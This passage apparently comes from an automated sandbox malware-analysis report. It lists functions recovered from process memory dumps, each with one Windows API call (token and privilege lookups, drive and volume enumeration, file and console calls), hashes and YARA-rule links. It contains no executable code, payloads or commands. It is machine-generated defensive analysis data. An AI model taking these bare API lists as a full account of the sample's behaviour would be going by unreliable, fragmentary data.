                                                    • Instruction Fuzzy Hash: 30218E71604240AFF724DF25DC85BAAFBE8EF09614F14846AE948DB282D775E904CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 23bfcbae12d6c4c4a2b51b417e80d2c44e368217890f9dcffc1407bd93869a7c
                                                    • Instruction ID: 7768547bcad751f439f1c74dab8c3443f078d542be4a4f951f766d898a08d8af
                                                    • Opcode Fuzzy Hash: 23bfcbae12d6c4c4a2b51b417e80d2c44e368217890f9dcffc1407bd93869a7c
                                                    • Instruction Fuzzy Hash: 4E11AF72500304EFEB21CF61DC85FAAFBECEF04720F14856AF945DA541D670A9448BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 53839b3c284c87d4b82c19c005cf1159ee89d1bec8345877f724af3912845170
                                                    • Instruction ID: 658d8ba53b64a3cfdfd9e7d122a8ded6220ce85f35d3c4cc4d3dc37047af2c45
                                                    • Opcode Fuzzy Hash: 53839b3c284c87d4b82c19c005cf1159ee89d1bec8345877f724af3912845170
                                                    • Instruction Fuzzy Hash: 4C117F72600300EFEB21CF15DC86FABFBA8EF45760F14846AE905CB641D774E9048B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: cf12b48103bea5a19663a01155f397564fa12261fffc3d2bd7a7e83c3b91882c
                                                    • Instruction ID: 0b80647fae38a742db2d7e4fd0241a302fe3fc665bfa2baa7b6f535a97a019cd
                                                    • Opcode Fuzzy Hash: cf12b48103bea5a19663a01155f397564fa12261fffc3d2bd7a7e83c3b91882c
                                                    • Instruction Fuzzy Hash: 82219F725083809FEB21CF25DC45B96FFF4EF06220F0884AEED858B562D335A848DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 6078876c3489808ec46895b7b3cbdd324c19a0884751a2753c87120fcaa2f5d2
                                                    • Instruction ID: 615b241941c0c4f57ca74f6aa55238e42e729a86140f9d801d5adca21cc5420b
                                                    • Opcode Fuzzy Hash: 6078876c3489808ec46895b7b3cbdd324c19a0884751a2753c87120fcaa2f5d2
                                                    • Instruction Fuzzy Hash: 5D219F7150D3C09FDB12CB25CC55B92BFB4AF13214F0C84EAD988CF653D2649408C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 7656787e52416bbb2e7fec7dfcb6e32e25114d937ffd6c5373efbb95d0676deb
                                                    • Instruction ID: 40a665761307067b1b5141c13b4833cc0c4d77104284d196e1c1f3ccf6c3ddd6
                                                    • Opcode Fuzzy Hash: 7656787e52416bbb2e7fec7dfcb6e32e25114d937ffd6c5373efbb95d0676deb
                                                    • Instruction Fuzzy Hash: 72219F725093C09FEB128B25DC55B96BFA4EF07320F0984EADD858F263D264A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 132872abacfc22acebfd6eb957e92931c5a9020be8a04f6bbd0d54c65bee43f1
                                                    • Instruction ID: 62b844bb0610d179cf811b6e26011bed0b40b525a46b24332c3eced9c5fb8610
                                                    • Opcode Fuzzy Hash: 132872abacfc22acebfd6eb957e92931c5a9020be8a04f6bbd0d54c65bee43f1
                                                    • Instruction Fuzzy Hash: AC2172B26053849FD722CF25DC44B52BFE8EF56714F0984AEED49CB252D265EC04CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: f4bd5171dd00924f7aa5af34b3a7ddeff3345516d6eb9b3c2ee0357d0f426693
                                                    • Instruction ID: 88f8babebbafc2bc2bac9b7386e9f6bfe110f1a04448f2bd7b6cc9e2ce283717
                                                    • Opcode Fuzzy Hash: f4bd5171dd00924f7aa5af34b3a7ddeff3345516d6eb9b3c2ee0357d0f426693
                                                    • Instruction Fuzzy Hash: A1216D6140D3C49FD7138B259C54A62BFB4EF57620F0980DBD8898F2A3D6696808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 624561459d99501937bccd2ab821e62938d8ac5218af08840e4d3b43d1076e61
                                                    • Instruction ID: 67e0a742e2a9b1937d987f786e47f3124bacfff1566a9b3095add4a5cd7d85a8
                                                    • Opcode Fuzzy Hash: 624561459d99501937bccd2ab821e62938d8ac5218af08840e4d3b43d1076e61
                                                    • Instruction Fuzzy Hash: 9E11B272500704EFEB21DF55DC85FABFBA8EF44720F14846EE905CA541D770A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 7789d1cbc038ca93acb39fdc9bf9e836b0e787c6ad1401965fda78cc1aaf71a8
                                                    • Instruction ID: dc6d0460e414f3d7895aba85173fc137ef0048fc6d3a6233cb61114e05c49af4
                                                    • Opcode Fuzzy Hash: 7789d1cbc038ca93acb39fdc9bf9e836b0e787c6ad1401965fda78cc1aaf71a8
                                                    • Instruction Fuzzy Hash: 31119D76504380AFDB22CF65CC45B52FFF4EF16310F0984AEE9898B662D375A818CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 027408E5
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 7b89a7ba07a25d0c8e17aa73b0d6da2819ec71651c52a55f2a8730fb84cd3ca5
                                                    • Instruction ID: 5fcc87ddb3f4d55c286d15ecaee5b3b3c68ba81fe0bcbf52588b8152e60f1f5d
                                                    • Opcode Fuzzy Hash: 7b89a7ba07a25d0c8e17aa73b0d6da2819ec71651c52a55f2a8730fb84cd3ca5
                                                    • Instruction Fuzzy Hash: 0E11BF72400300EFEB21CF51DC45FAAFBA8EF54720F14896AEE499A241C771A904CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 003CA39C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 3b26556895a480565674c1ebaad269e031df324ee321e7c55c30e624ea059a47
                                                    • Instruction ID: 5ea4f6c214751ad97d5a8176afc99c757a2e1ce648690ace02fe788f62cff9c5
                                                    • Opcode Fuzzy Hash: 3b26556895a480565674c1ebaad269e031df324ee321e7c55c30e624ea059a47
                                                    • Instruction Fuzzy Hash: 60118F715093C49FE7128B15DC54BA2BFB4DF47614F0880DEEDC48F253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 229f02d85ded7c637c98af133f54e8b8c31a525ccf3fb9201bdab28b9c73084b
                                                    • Instruction ID: 5e068c90aefd85a51e3ec95d2196560c810ce7ce16d9cc4cbdd68ef450d69c3d
                                                    • Opcode Fuzzy Hash: 229f02d85ded7c637c98af133f54e8b8c31a525ccf3fb9201bdab28b9c73084b
                                                    • Instruction Fuzzy Hash: 6B1191725093849FDB218F25DC45B96FFE4EF46220F0984EEED498B252D375A848CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: a2b4682e60742154135a772c3336300c3c5f8b629a083a82d7288583bac5d455
                                                    • Instruction ID: 486ff134b3010505e29930551f098d17b573641a1e0d13f90498d0aab56f6f69
                                                    • Opcode Fuzzy Hash: a2b4682e60742154135a772c3336300c3c5f8b629a083a82d7288583bac5d455
                                                    • Instruction Fuzzy Hash: AC11C2765093C09FDB128B15DC95B52FFB4EF43220F0880EFED858B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 003CAA71
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 74012abc5f806209b44f035a9db8591a8a4928c6af5a65cb4a5e542564608fce
                                                    • Instruction ID: ea246906aa4cb8993963b0b1ea7cc47091339f4ed4644c62a22df99ad03c5528
                                                    • Opcode Fuzzy Hash: 74012abc5f806209b44f035a9db8591a8a4928c6af5a65cb4a5e542564608fce
                                                    • Instruction Fuzzy Hash: DA11C17640D7C49FD7128B21DC85B91BFA0EF13324F0A80DBDD848F163D268A909C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: fbe94f483382fe36a3561c6566e4efd072cd2a6ea819c916f0edf657f6ad1fcf
                                                    • Instruction ID: 0e232c3dddbcaf5f890bfcac77edcc52b52c3f8d83ea9dd7860f374b27e1aae5
                                                    • Opcode Fuzzy Hash: fbe94f483382fe36a3561c6566e4efd072cd2a6ea819c916f0edf657f6ad1fcf
                                                    • Instruction Fuzzy Hash: 46117CB26007048FEB21DF25DC85B56FBE8EB15724F08846EDD09CB642D670EC04CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: d1db196dfddf6ce022dc955fff4769f652703b556a7f3fd3e2d50621d8582dd1
                                                    • Instruction ID: 4778ae3c70fc877ccaa75de2ad478a1c32026cc5b161b14771cf767c76878297
                                                    • Opcode Fuzzy Hash: d1db196dfddf6ce022dc955fff4769f652703b556a7f3fd3e2d50621d8582dd1
                                                    • Instruction Fuzzy Hash: 52119D714093C09FE7128B25DC55B92BFB4EF07324F0980DAD9848B263C365A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 02740819
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 855714df6c46d889bea22785b8527e28cfaee865fbdfc4924e0e86658c527d70
                                                    • Instruction ID: 9d74b978c4eda5f325d926adaa7046c9294368a215e405349f52160b05bd8cda
                                                    • Opcode Fuzzy Hash: 855714df6c46d889bea22785b8527e28cfaee865fbdfc4924e0e86658c527d70
                                                    • Instruction Fuzzy Hash: 43018072500704EFFB209F15DD86BA6FB9CDF45720F14C4AAEE099A241DB74A904CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 5f41f6e2a99d3c1aae4561380924f3478b0dec8d14812adaedc8980bdcb2a311
                                                    • Instruction ID: 8d17491d9306c5a529582ab8c65bd73b1f6318ccfd6bf35f4e4133467b721bec
                                                    • Opcode Fuzzy Hash: 5f41f6e2a99d3c1aae4561380924f3478b0dec8d14812adaedc8980bdcb2a311
                                                    • Instruction Fuzzy Hash: 95118B76600700DFEB20DF5ADC85B66FBA4EF04620F48C4AEED498B652D771E448CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 003CABC9
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: fd040772429a4c75a0d732cea76c961a89efce85c91f3698076def180d7c6f6f
                                                    • Instruction ID: 22716b7da29b436f9a39803b19ff22b8760ae6b6c000c2e531bffc082411e8fc
                                                    • Opcode Fuzzy Hash: fd040772429a4c75a0d732cea76c961a89efce85c91f3698076def180d7c6f6f
                                                    • Instruction Fuzzy Hash: 5C11C2B64097849FDB11CF55DC85B92BFA4EF52324F0A80ABDD488F153D274A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 06b32da22ba3f378910fe5529c99f48ecc50b167d339c5e942531f05ff009d84
                                                    • Instruction ID: ce0ab87e00a9089e9a66deec5c4b371d2e4cc961f6c35aa608132ea0640371c6
                                                    • Opcode Fuzzy Hash: 06b32da22ba3f378910fe5529c99f48ecc50b167d339c5e942531f05ff009d84
                                                    • Instruction Fuzzy Hash: 8A118E76500700DFDB21CF55DC45B66FBE4EF14710F0884AEDD898A612D771E814DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 003CA23E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 61d8958a2d535e6895ceb281493eca0f74442b7b6529d84f6e3aacca3874540b
                                                    • Instruction ID: bd008b9091d7a259abb052f35f4b00ab37625457ce70989a617d2b7efe25822b
                                                    • Opcode Fuzzy Hash: 61d8958a2d535e6895ceb281493eca0f74442b7b6529d84f6e3aacca3874540b
                                                    • Instruction Fuzzy Hash: 48018471900600AFE310DF16DC46B76FBE8FB85A20F14856AED089B741D275F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 32382befbb91ca88c86adaa9659c9667379213d3527a2fa5cb54d13d894ff7d7
                                                    • Instruction ID: 3f08ac941ebc8c59fbf53dc4af2610cf288b47a64539330885968d2698bb74e1
                                                    • Opcode Fuzzy Hash: 32382befbb91ca88c86adaa9659c9667379213d3527a2fa5cb54d13d894ff7d7
                                                    • Instruction Fuzzy Hash: C7017172900600AFE310DF16DC46B66FBA8FB85A20F14856AED089B741D275B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: c170585218739f4de80284814d42f3f21b1ebd522405d0040558aefa31fecbac
                                                    • Instruction ID: 34cf75f7d2055592f850c76bfbc220a37d0634a485b6c4333c9d816e78cd13de
                                                    • Opcode Fuzzy Hash: c170585218739f4de80284814d42f3f21b1ebd522405d0040558aefa31fecbac
                                                    • Instruction Fuzzy Hash: E9019E72600344CFEB10DF25DC8576AFBA8EB01620F0884AADE09CB642DB74E404CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 21f46704cdcb35dea31a34319fba04d7e39603a5c61c3566e40abd3280bf3c26
                                                    • Instruction ID: 6873f9021bf12892cc996a192961ecb83fccf4d166da8425fd6715639783be03
                                                    • Opcode Fuzzy Hash: 21f46704cdcb35dea31a34319fba04d7e39603a5c61c3566e40abd3280bf3c26
                                                    • Instruction Fuzzy Hash: 7D01BC72500200DFEB218F15DC86BAAFBA4EF05720F18C4AEDD49CB656D375AC04CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 69a8b1719ede7eca92ae62e175374c43e74a9e27df40c574fccaf7fd133d7161
                                                    • Instruction ID: 9fab4a0cea727f9201f264794d226a710f6cfd2e7f0cfa57148ad0b2c6380716
                                                    • Opcode Fuzzy Hash: 69a8b1719ede7eca92ae62e175374c43e74a9e27df40c574fccaf7fd133d7161
                                                    • Instruction Fuzzy Hash: F601DF72500300DFEF20DF15DC857AAFBE4EF05624F48C4AADD098B642D775A444CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    • Opcode ID: f733b759d2b3110be4b7fff4fbe1622254c1102743ee0ace8bdefa8937cc9cb9
                                                    • Instruction ID: f04ca1726a71d913345b8004d858eb8d11c97da2c0da865785d1d62db6e88502
                                                    • Opcode Fuzzy Hash: f733b759d2b3110be4b7fff4fbe1622254c1102743ee0ace8bdefa8937cc9cb9
                                                    • Instruction Fuzzy Hash: B0016272900600ABD310DF16DC46B26FBA4FB89B20F14816AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: d5a290317bfc6eafb578eb8617ba736bf663d3bfe4ce4e822122c80fe7705b9a
                                                    • Instruction ID: 7817b407c74e57cc1b3724970ba4915c575b873520f04b056ef551224a30a5fd
                                                    • Opcode Fuzzy Hash: d5a290317bfc6eafb578eb8617ba736bf663d3bfe4ce4e822122c80fe7705b9a
                                                    • Instruction Fuzzy Hash: A5017C71504340DFEB10DF15D885B66FB94EB02620F1885BADD488F246D774E504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: dc26f390ef1ea9daece56c39612cb01b9e6aa41e1653dd0eb905195431184aab
                                                    • Instruction ID: b685fd8e2e7745c0f9a532a184469641d029104af4d9b9b11ecc47697f57801d
                                                    • Opcode Fuzzy Hash: dc26f390ef1ea9daece56c39612cb01b9e6aa41e1653dd0eb905195431184aab
                                                    • Instruction Fuzzy Hash: 8E016272900600ABD310DF16DC46B26FBA4FB89B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: fe9c84932f0ba03d082733ac90ecba62b675ea5f99ad011819ec647107224420
                                                    • Instruction ID: 850f032b9823096a9df4878d180b0e8ea96dcc8e9e1f9b6fe8e27ad6b1a33861
                                                    • Opcode Fuzzy Hash: fe9c84932f0ba03d082733ac90ecba62b675ea5f99ad011819ec647107224420
                                                    • Instruction Fuzzy Hash: 0E01F435500700CFEB108F15D885765FBA0EF41720F08C0AEDE0A8B752D774E804DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 003CABC9
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 4ec595045c001c37c4adf60d6946d91c12a1a978f1e359933906641fba257e71
                                                    • Instruction ID: 59afb05737bec8270980e20b276b1f19d1ac0fa7dc8dce97d3159b796ef0b867
                                                    • Opcode Fuzzy Hash: 4ec595045c001c37c4adf60d6946d91c12a1a978f1e359933906641fba257e71
                                                    • Instruction Fuzzy Hash: B501DC31404B44CFEB10DF55DC89BA5FBA4EF01724F18C4AACD08CF602D274A804CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02741116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
